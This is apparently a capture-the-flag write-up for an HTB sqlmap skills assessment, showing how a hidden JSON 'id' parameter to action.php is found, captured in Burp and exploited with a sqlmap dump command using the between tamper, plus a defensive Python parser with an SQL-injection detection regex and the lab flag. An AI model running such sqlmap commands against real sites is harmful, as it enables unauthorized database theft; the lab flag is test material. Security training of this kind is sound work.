# SQLMap - Skills Assessment


## Introduction

sqlmap is an open-source penetration testing tool designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications. It supports a wide range of SQL injection techniques, including boolean-based, time-based, error-based, and UNION query-based attacks.

The goal of this module is to introduce us to the tool and to show how it is useful in real-world scenarios where SQLi is feasible. That is why, in this writeup, the key is finding the vulnerable parameter.

## Enumeration

This one was kind of easy; the hard part was finding where to perform the SQL injection.

They gave us a basic, static shop website.


Here we could find some forms where one would expect some kind of injection, but that was not the case.


Eventually, I found some odd `<script>` code inside cart.html, so I decided to keep looking for this kind of script on the other pages, and that is when I found the following in shop.html:

```html
<script>
    // Fires when any element with the class .add-to-cart is clicked
    $(".add-to-cart").click(function(event) {
        event.preventDefault();  // suppress the default link/form action

        let xhr = new XMLHttpRequest();
        let url = "action.php";  // back-end endpoint, not reachable from any visible form

        xhr.open("POST", url, true);
        xhr.setRequestHeader("Content-Type", "application/json");

        xhr.onreadystatechange = function () {
            if (xhr.readyState === 4 && xhr.status === 200) {
                alert("Item added!!!");
            }
        };

        // JSON body; this hard-coded id is the parameter tested with sqlmap later
        var data = JSON.stringify({ "id": 1 });
        xhr.send(data);
    });
</script>
```

This JavaScript handler adds an item to the cart when an element with the class .add-to-cart is clicked. It uses AJAX through a raw XMLHttpRequest to POST a JSON body to action.php asynchronously, so the id parameter never appears in any visible form. When we clicked the "Add to cart" button, an HTTP message popped up saying:


## Analyzing the add-item-to-cart request

Then I used Burp to analyse the request, and this was it:

```http
POST /action.php HTTP/1.1
Host: 94.237.59.188:34267
Content-Length: 8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Sec-GPC: 1
Accept-Language: en-US,en
Origin: http://94.237.59.188:34267
Referer: http://94.237.59.188:34267/shop.html
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"id":1}
```

## SQLi against id parameter

My next step was to attempt an SQL injection against that id JSON parameter using sqlmap, feeding it the saved request and using between as the tamper script. sqlmap reads the JSON body from the request file and tests its values as injection points; the between tamper rewrites the `=` and `>` comparisons in its payloads as `BETWEEN` expressions, which helps when the application filters those operators.

```bash
sqlmap -r req.txt --batch --dump -T final_flag --tamper=between
```

The result was successful. Not so hard, right?!
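As an added illustration, not code from this writeup or from sqlmap itself: a minimal parser that reads a saved request in the form fed to `sqlmap -r` and pulls out the JSON body, followed by a server-side style check that flags bodies whose id is not a JSON integer or carries injection markers, including the BETWEEN comparisons the between tamper substitutes. The expected body shape (SCHEMA) is an assumption, since action.php's source is not on the page, and the sample request is constructed from the one above.

```python
import json
import re
# Constructed sample modelled on the Burp request saved as req.txt (headers trimmed).
RAW_REQUEST = (
    "POST /action.php HTTP/1.1\r\n"
    "Host: 94.237.59.188:34267\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 8\r\n"
    "\r\n"
    '{"id":1}'
)

# Assumed contract for action.php (its source is not on the page): "id" is a JSON integer.
SCHEMA = {"id": int}

# SQLi markers in a string value; the last alternative also matches the BETWEEN
# comparisons that sqlmap's between tamper substitutes for "=" and ">".
SQLI_PATTERN = re.compile(r"""(?ix)
    (?:'|"|--|\#|/\*)
  | \b(?:union\s+(?:all\s+)?select|sleep|benchmark|waitfor)\b
  | \b(?:or|and)\b\s+[\w'"]+\s*(?:=|>|<|\s+(?:not\s+)?between\b)
""")

def parse_raw_request(raw):
    """Split a saved raw request (sqlmap -r format) into method, path, headers and JSON body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    data = None
    if headers.get("content-type", "").startswith("application/json") and body:
        data = json.loads(body)
    return {"method": method, "path": path, "headers": headers, "json": data}

def check_json_body(data, schema=SCHEMA):
    """Return (key, reason) findings: unexpected keys, wrong JSON types, injection markers."""
    findings = []
    for key, value in data.items():
        if key not in schema:
            findings.append((key, "unexpected parameter"))
            continue
        if type(value) is not schema[key]:
            findings.append((key, f"expected {schema[key].__name__}, got {type(value).__name__}"))
        if isinstance(value, str) and SQLI_PATTERN.search(value):
            findings.append((key, "sql injection marker"))
    return findings
```

Run against the constructed request, the body parses to `{"id": 1}` and produces no findings; a string id, a tampered probe, or an extra key each produce one.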


HTB{sqlmap_finished!}